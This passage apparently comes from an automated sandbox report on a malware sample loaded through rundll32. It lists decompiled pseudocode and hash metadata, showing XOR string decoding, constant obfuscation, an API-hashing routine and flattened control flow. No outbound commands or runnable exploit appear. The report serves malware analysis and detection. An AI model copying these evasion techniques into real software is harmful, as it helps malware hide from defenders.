                                                                                                                      				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
                                                                                                                      				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
                                                                                                                      				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
                                                                                                                      				 *(_t92 + 0x24) = 0x2326e4;
                                                                                                                      				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
                                                                                                                      				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
                                                                                                                      				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
                                                                                                                      				_t66 =  *__edx;
                                                                                                                      				_t80 =  &(_t79[1]);
                                                                                                                      				_t50 =  *_t79 ^ _t66;
                                                                                                                      				 *(_t92 + 0x2c) = _t66;
                                                                                                                      				 *(_t92 + 0x30) = _t50;
                                                                                                                      				_t30 = _t50 + 1; // 0xb
                                                                                                                      				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
                                                                                                                      				_t93 = _t92 + 0xc;
                                                                                                                      				_t63 = E00687FF2(_t82);
                                                                                                                      				 *(_t93 + 0x1c) = _t63;
                                                                                                                      				if(_t63 != 0) {
                                                                                                                      					_t90 = 0;
                                                                                                                      					_t78 = _t63;
                                                                                                                      					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
                                                                                                                      					if(_t88 != 0) {
                                                                                                                      						_t64 =  *(_t93 + 0x1c);
                                                                                                                      						do {
                                                                                                                      							_t72 =  *_t80;
                                                                                                                      							_t80 =  &(_t80[1]);
                                                                                                                      							_t73 = _t72 ^ _t64;
                                                                                                                      							 *_t78 = _t73;
                                                                                                                      							_t78 =  &(_t78[1]);
                                                                                                                      							_t74 = _t73 >> 0x10;
                                                                                                                      							 *((char*)(_t78 - 3)) = _t73 >> 8;
                                                                                                                      							 *(_t78 - 2) = _t74;
                                                                                                                      							_t90 = _t90 + 1;
                                                                                                                      							 *((char*)(_t78 - 1)) = _t74 >> 8;
                                                                                                                      						} while (_t90 < _t88);
                                                                                                                      						_t63 =  *(_t93 + 0x18);
                                                                                                                      					}
                                                                                                                      					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
                                                                                                                      				}
                                                                                                                      				return _t63;
                                                                                                                      			}




















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &#
                                                                                                                      • API String ID: 0-2240308938
                                                                                                                      • Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                      • Instruction ID: dc65802980464edf29ea6d1bada734de058abcef200ee17f15acf5b85915b755
                                                                                                                      • Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                      • Instruction Fuzzy Hash: 40318D726083418FC704DF28C88585BFBE0FF98718F054B6DE889A7201C774EA09CB9A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0069DCF7(void* __ecx, signed int* __edx, void* __eflags) {
                                                                                                                      				void* _t39;
                                                                                                                      				signed int _t43;
                                                                                                                      				signed int _t60;
                                                                                                                      				signed int _t61;
                                                                                                                      				signed int _t63;
                                                                                                                      				signed int _t70;
                                                                                                                      				unsigned int _t71;
                                                                                                                      				unsigned int _t72;
                                                                                                                      				signed int _t76;
                                                                                                                      				signed int* _t77;
                                                                                                                      				signed int* _t78;
                                                                                                                      				unsigned int _t80;
                                                                                                                      				void* _t86;
                                                                                                                      				short _t88;
                                                                                                                      				void* _t90;
                                                                                                                      				void* _t91;
                                                                                                                      
                                                                                                                      				_push( *(_t90 + 0x28));
                                                                                                                      				_push( *(_t90 + 0x28));
                                                                                                                      				_push(__edx);
                                                                                                                      				E006920B9(_t39);
                                                                                                                      				 *(_t90 + 0x24) = 0xf19f37;
                                                                                                                      				_t77 =  &(__edx[1]);
                                                                                                                      				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
                                                                                                                      				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
                                                                                                                      				 *(_t90 + 0x20) = 0xb1a340;
                                                                                                                      				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
                                                                                                                      				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
                                                                                                                      				 *(_t90 + 0x1c) = 0x9743e1;
                                                                                                                      				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
                                                                                                                      				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
                                                                                                                      				_t63 =  *__edx;
                                                                                                                      				_t78 =  &(_t77[1]);
                                                                                                                      				_t43 =  *_t77 ^ _t63;
                                                                                                                      				 *(_t90 + 0x28) = _t63;
                                                                                                                      				 *(_t90 + 0x2c) = _t43;
                                                                                                                      				_t21 = _t43 + 1; // 0xf19f38
                                                                                                                      				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
                                                                                                                      				_t91 = _t90 + 8;
                                                                                                                      				_t60 = E00687FF2(_t80 + _t80);
                                                                                                                      				 *(_t91 + 0x1c) = _t60;
                                                                                                                      				if(_t60 != 0) {
                                                                                                                      					_t88 = 0;
                                                                                                                      					_t76 = _t60;
                                                                                                                      					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
                                                                                                                      					if(_t86 != 0) {
                                                                                                                      						_t61 =  *(_t91 + 0x1c);
                                                                                                                      						do {
                                                                                                                      							_t70 =  *_t78;
                                                                                                                      							_t78 =  &(_t78[1]);
                                                                                                                      							_t71 = _t70 ^ _t61;
                                                                                                                      							 *_t76 = _t71 & 0x000000ff;
                                                                                                                      							_t76 = _t76 + 8;
                                                                                                                      							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
                                                                                                                      							_t72 = _t71 >> 0x10;
                                                                                                                      							_t88 = _t88 + 1;
                                                                                                                      							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
                                                                                                                      							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
                                                                                                                      						} while (_t88 < _t86);
                                                                                                                      						_t60 =  *(_t91 + 0x18);
                                                                                                                      					}
                                                                                                                      					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
                                                                                                                      				}
                                                                                                                      				return _t60;
                                                                                                                      			}




















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: g|E
                                                                                                                      • API String ID: 0-3824901942
                                                                                                                      • Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                      • Instruction ID: 35eb32f1e52c52b0e67822169ee5c8ba9677966b4353620c49165c21127f77f5
                                                                                                                      • Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                      • Instruction Fuzzy Hash: AC31B0766083118FC714DF29C48146BF7E1FF88318F014B6EE889AB251D774EA09CB9A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E006851BB() {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				intOrPtr _v32;
                                                                                                                      				void* _t72;
                                                                                                                      				intOrPtr _t83;
                                                                                                                      				signed int _t87;
                                                                                                                      				signed int _t88;
                                                                                                                      				signed int _t89;
                                                                                                                      
                                                                                                                      				_v28 = _v28 & 0x00000000;
                                                                                                                      				_v32 = 0x54cf7d;
                                                                                                                      				_v16 = 0x3835ff;
                                                                                                                      				_v16 = _v16 >> 0xa;
                                                                                                                      				_v16 = _v16 * 0x17;
                                                                                                                      				_v16 = _v16 ^ 0x00095bb8;
                                                                                                                      				_t72 = 0xe98fb1d;
                                                                                                                      				_v24 = 0x583681;
                                                                                                                      				_t87 = 0x44;
                                                                                                                      				_v24 = _v24 / _t87;
                                                                                                                      				_v24 = _v24 ^ 0x000eb9f7;
                                                                                                                      				_v12 = 0x832b1f;
                                                                                                                      				_v12 = _v12 << 5;
                                                                                                                      				_v12 = _v12 | 0x242a8544;
                                                                                                                      				_v12 = _v12 ^ 0x346a2866;
                                                                                                                      				_v8 = 0x6a77bb;
                                                                                                                      				_v8 = _v8 >> 0xe;
                                                                                                                      				_t88 = 0x19;
                                                                                                                      				_v8 = _v8 / _t88;
                                                                                                                      				_v8 = _v8 ^ 0x9d9369f0;
                                                                                                                      				_v8 = _v8 ^ 0x9d908f3a;
                                                                                                                      				_v20 = 0x4802c8;
                                                                                                                      				_t89 = 0x21;
                                                                                                                      				_v20 = _v20 / _t89;
                                                                                                                      				_v20 = _v20 + 0xffffbfc3;
                                                                                                                      				_v20 = _v20 ^ 0x000df493;
                                                                                                                      				do {
                                                                                                                      					while(_t72 != 0x9835b86) {
                                                                                                                      						if(_t72 == 0xe98fb1d) {
                                                                                                                      							_push(_t72);
                                                                                                                      							_push(_t72);
                                                                                                                      							 *0x6a3e04 = E00687FF2(0x134);
                                                                                                                      							_t72 = 0x9835b86;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						goto L5;
                                                                                                                      					}
                                                                                                                      					_t83 =  *0x6a3e04; // 0x0
                                                                                                                      					E00690001(_v8, _t83 + 0x18, _v20);
                                                                                                                      					_t72 = 0x7dce4e4;
                                                                                                                      					L5:
                                                                                                                      				} while (_t72 != 0x7dce4e4);
                                                                                                                      				return 1;
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: f(j4
                                                                                                                      • API String ID: 0-3086030595
                                                                                                                      • Opcode ID: 891a4bdec6470d49626589fcada9133bdcc0f62fd14caebab739823ca1cb6001
                                                                                                                      • Instruction ID: 1d0ead0c129f2896bd234912bfbc68fa155e945bacbea7311d6f1cfbcfd616d6
                                                                                                                      • Opcode Fuzzy Hash: 891a4bdec6470d49626589fcada9133bdcc0f62fd14caebab739823ca1cb6001
                                                                                                                      • Instruction Fuzzy Hash: FF314971E01219EBCF08EFAAD9855EEBBB2FB44324F208199E505AB250D7B45F45CF80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E00682051(void* __edx, signed int _a4, intOrPtr _a8) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				void* _t71;
                                                                                                                      				signed int _t78;
                                                                                                                      				signed int _t80;
                                                                                                                      				signed int _t83;
                                                                                                                      				signed int _t92;
                                                                                                                      				signed int _t95;
                                                                                                                      				signed short* _t97;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_t97 = _a4;
                                                                                                                      				_push(_t97);
                                                                                                                      				E006920B9(_t71);
                                                                                                                      				_v16 = 0x71ca23;
                                                                                                                      				_v12 = 0x57f692;
                                                                                                                      				_v8 = 0;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v20 = 0xd3252c;
                                                                                                                      				_v20 = _v20 + 0x4351;
                                                                                                                      				_v20 = _v20 + 0xffff5b79;
                                                                                                                      				_v20 = _v20 ^ 0x00d2c3f6;
                                                                                                                      				_a4 = 0xbb067e;
                                                                                                                      				_t83 = 0x11;
                                                                                                                      				_a4 = _a4 / _t83;
                                                                                                                      				_a4 = _a4 >> 8;
                                                                                                                      				_a4 = _a4 ^ 0xac5d3832;
                                                                                                                      				_a4 = _a4 ^ 0xac5d3334;
                                                                                                                      				_a4 = 0xab60c2;
                                                                                                                      				_a4 = _a4 << 0x10;
                                                                                                                      				_a4 = _a4 ^ 0x910d5570;
                                                                                                                      				_a4 = _a4 >> 4;
                                                                                                                      				_a4 = _a4 ^ 0x0f1cf547;
                                                                                                                      				if( *_t97 != 0) {
                                                                                                                      					do {
                                                                                                                      						_t80 = _v20;
                                                                                                                      						_a4 = 0xbb067e;
                                                                                                                      						_a4 = _a4 / _t83;
                                                                                                                      						_a4 = _a4 >> 8;
                                                                                                                      						_a4 = _a4 ^ 0xac5d3832;
                                                                                                                      						_a4 = _a4 ^ 0xac5d3334;
                                                                                                                      						_a4 = 0xab60c2;
                                                                                                                      						_a4 = _a4 << 0x10;
                                                                                                                      						_a4 = _a4 ^ 0x910d5570;
                                                                                                                      						_a4 = _a4 >> 4;
                                                                                                                      						_a4 = _a4 ^ 0x0f1cf547;
                                                                                                                      						_t92 = _v20 << _a4;
                                                                                                                      						_t78 =  *_t97 & 0x0000ffff;
                                                                                                                      						_t95 = _v20 << _a4;
                                                                                                                      						if(_t78 >= 0x41 && _t78 <= 0x5a) {
                                                                                                                      							_t78 = _t78 + 0x20;
                                                                                                                      						}
                                                                                                                      						_v20 = _t78;
                                                                                                                      						_t97 =  &(_t97[1]);
                                                                                                                      						_v20 = _v20 + _t92;
                                                                                                                      						_v20 = _v20 + _t95;
                                                                                                                      						_v20 = _v20 - _t80;
                                                                                                                      						_t83 = 0x11;
                                                                                                                      					} while ( *_t97 != 0);
                                                                                                                      				}
                                                                                                                      				return _v20;
                                                                                                                      			}
















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: QC
                                                                                                                      • API String ID: 0-229404352
                                                                                                                      • Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                      • Instruction ID: 1bb9fac19006013846ff9ca00b4cb53391d8354f70f727299f18881acd24015a
                                                                                                                      • Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                      • Instruction Fuzzy Hash: CB3117715083818BD315DF29C49905BBBE1FFC87A8F548E1DF5C9A2225D3B4C688CB5A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0069176B(void* __ecx, void* __eflags) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				signed int _t87;
                                                                                                                      				signed int _t91;
                                                                                                                      				signed int _t92;
                                                                                                                      				signed int _t93;
                                                                                                                      				void* _t102;
                                                                                                                      				signed int _t103;
                                                                                                                      
                                                                                                                      				_v36 = _v36 & 0x00000000;
                                                                                                                      				_v40 = 0x355323;
                                                                                                                      				_v24 = 0x6eb9b5;
                                                                                                                      				_v24 = _v24 + 0x6c21;
                                                                                                                      				_t102 = __ecx;
                                                                                                                      				_t91 = 0x64;
                                                                                                                      				_v24 = _v24 / _t91;
                                                                                                                      				_v24 = _v24 ^ 0x0005c519;
                                                                                                                      				_v32 = 0xba69a0;
                                                                                                                      				_v32 = _v32 << 7;
                                                                                                                      				_v32 = _v32 ^ 0x5d3c95d0;
                                                                                                                      				_v20 = 0x99612d;
                                                                                                                      				_v20 = _v20 | 0x6bf7bfaf;
                                                                                                                      				_v20 = _v20 + 0x66ac;
                                                                                                                      				_v20 = _v20 ^ 0x6c036c89;
                                                                                                                      				_v16 = 0xd72900;
                                                                                                                      				_v16 = _v16 + 0xffff2462;
                                                                                                                      				_v16 = _v16 ^ 0xa7b97bfd;
                                                                                                                      				_v16 = _v16 + 0xffff7578;
                                                                                                                      				_v16 = _v16 ^ 0xa76084ba;
                                                                                                                      				_v12 = 0xeb6610;
                                                                                                                      				_t92 = 0x6f;
                                                                                                                      				_v12 = _v12 / _t92;
                                                                                                                      				_v12 = _v12 << 0xf;
                                                                                                                      				_v12 = _v12 ^ 0x2e835447;
                                                                                                                      				_v12 = _v12 ^ 0x21f4cf0c;
                                                                                                                      				_v28 = 0x644f8d;
                                                                                                                      				_v28 = _v28 << 3;
                                                                                                                      				_v28 = _v28 << 0xa;
                                                                                                                      				_v28 = _v28 ^ 0x89f1a004;
                                                                                                                      				_v8 = 0xbb77ef;
                                                                                                                      				_t93 = 0x72;
                                                                                                                      				_v8 = _v8 * 0x3c;
                                                                                                                      				_v8 = _v8 / _t93;
                                                                                                                      				_v8 = _v8 << 6;
                                                                                                                      				_v8 = _v8 ^ 0x18aaba50;
                                                                                                                      				_t87 = E00690AE0(_v8, _v28);
                                                                                                                      				_push(_v12);
                                                                                                                      				_t103 = _t87;
                                                                                                                      				_push(_t102);
                                                                                                                      				_push(_t103);
                                                                                                                      				_push(3);
                                                                                                                      				E006880E3(_v20, _v16);
                                                                                                                      				 *((short*)(_t102 + _t103 * 2)) = 0;
                                                                                                                      				return 0;
                                                                                                                      			}



















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #S5
                                                                                                                      • API String ID: 0-40889119
                                                                                                                      • Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                      • Instruction ID: 4c83b0e7f082189cc35e74dc4cd6b382213a6e505aae77c32fefb0f2738bbbc2
                                                                                                                      • Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                      • Instruction Fuzzy Hash: 213132B2D0020AEBDB48DFE5C94AAEEBBB2FB44304F20809AD515B6250D7B50B15CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E006A09B5(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				char _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				signed int _t77;
                                                                                                                      				signed int _t88;
                                                                                                                      				signed int _t89;
                                                                                                                      
                                                                                                                      				_v40 = _v40 & 0x00000000;
                                                                                                                      				_v32 = 4;
                                                                                                                      				_v52 = 0xab6069;
                                                                                                                      				_v48 = 0xcf1f96;
                                                                                                                      				_v44 = 0x29044d;
                                                                                                                      				_v24 = 0xea6416;
                                                                                                                      				_v24 = _v24 | 0x7adbff7d;
                                                                                                                      				_v24 = _v24 ^ 0x5afbff7f;
                                                                                                                      				_v16 = 0x725236;
                                                                                                                      				_v16 = _v16 + 0xffff3c91;
                                                                                                                      				_v16 = _v16 << 7;
                                                                                                                      				_t88 = 0x2b;
                                                                                                                      				_v16 = _v16 / _t88;
                                                                                                                      				_v16 = _v16 ^ 0x015653a2;
                                                                                                                      				_v12 = 0xbf3984;
                                                                                                                      				_v12 = _v12 ^ 0x457d3893;
                                                                                                                      				_t89 = 0x44;
                                                                                                                      				_v12 = _v12 / _t89;
                                                                                                                      				_v12 = _v12 + 0x25bc;
                                                                                                                      				_v12 = _v12 ^ 0x0106bc10;
                                                                                                                      				_v20 = 0xd655eb;
                                                                                                                      				_v20 = _v20 | 0x2344b0aa;
                                                                                                                      				_v20 = _v20 * 0x16;
                                                                                                                      				_v20 = _v20 ^ 0x147fb4df;
                                                                                                                      				_v8 = 0x70d8dc;
                                                                                                                      				_v8 = _v8 + 0xe534;
                                                                                                                      				_v8 = _v8 ^ 0xb5155b0d;
                                                                                                                      				_v8 = _v8 >> 7;
                                                                                                                      				_v8 = _v8 ^ 0x01640b3f;
                                                                                                                      				_v28 = 0x2d9f47;
                                                                                                                      				_v28 = _v28 + 0xffffba71;
                                                                                                                      				_v28 = _v28 ^ 0x002c2593;
                                                                                                                      				_t77 = E006894EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
                                                                                                                      				asm("sbb eax, eax");
                                                                                                                      				return  ~_t77 & _v36;
                                                                                                                      			}



















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6Rr
                                                                                                                      • API String ID: 0-3911282678
                                                                                                                      • Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                      • Instruction ID: 5b35b2cc25e1c08cc3870ef09826158cf3b3b89b39341be7cf459152d59635c8
                                                                                                                      • Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                      • Instruction Fuzzy Hash: E531E1B1D1021EEBDB04CFA5C94A9EEFBB5FB44318F108699D121B6250D3B85B49CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00698519(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				void* _t55;
                                                                                                                      
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t55);
                                                                                                                      				_v8 = 0x519131;
                                                                                                                      				_v8 = _v8 ^ 0xec4619ea;
                                                                                                                      				_v8 = _v8 + 0x48c3;
                                                                                                                      				_v8 = _v8 ^ 0x9760daa2;
                                                                                                                      				_v8 = _v8 ^ 0x7b7f7884;
                                                                                                                      				_v16 = 0xb689a0;
                                                                                                                      				_v16 = _v16 + 0x133d;
                                                                                                                      				_v16 = _v16 ^ 0x00b72bb6;
                                                                                                                      				_v12 = 0xec38eb;
                                                                                                                      				_v12 = _v12 * 0x68;
                                                                                                                      				_v12 = _v12 | 0x70f3e2c1;
                                                                                                                      				_v12 = _v12 + 0xd290;
                                                                                                                      				_v12 = _v12 ^ 0x7ff36ca2;
                                                                                                                      				_v12 = 0x452aa4;
                                                                                                                      				_v12 = _v12 ^ 0xbb670255;
                                                                                                                      				_v12 = _v12 >> 1;
                                                                                                                      				_v12 = _v12 * 0x2d;
                                                                                                                      				_v12 = _v12 ^ 0x7280165f;
                                                                                                                      				_v24 = 0xb68a33;
                                                                                                                      				_v24 = _v24 + 0xffff2941;
                                                                                                                      				_v24 = _v24 ^ 0x00b92c3b;
                                                                                                                      				_v12 = 0x340add;
                                                                                                                      				_v12 = _v12 | 0xd5e1d7f7;
                                                                                                                      				_v12 = _v12 ^ 0xd5f6168b;
                                                                                                                      				_v20 = 0x853d17;
                                                                                                                      				_v20 = _v20 + 0xcd4d;
                                                                                                                      				_v20 = _v20 ^ 0x00837917;
                                                                                                                      				return E0068A30C(_v12, _a4, E00681DB9(__ecx), _v20);
                                                                                                                      			}










                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8
                                                                                                                      • API String ID: 0-719543824
                                                                                                                      • Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                      • Instruction ID: d55d70eddff9b0612619582e85e8aab9c42c4396166751580c7a730dc80b4962
                                                                                                                      • Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                      • Instruction Fuzzy Hash: 1321D2B6C00209EBCF88DFE1CA8689EBFB5FF00304F608189E411B6261D3B54B54DB95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                      • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
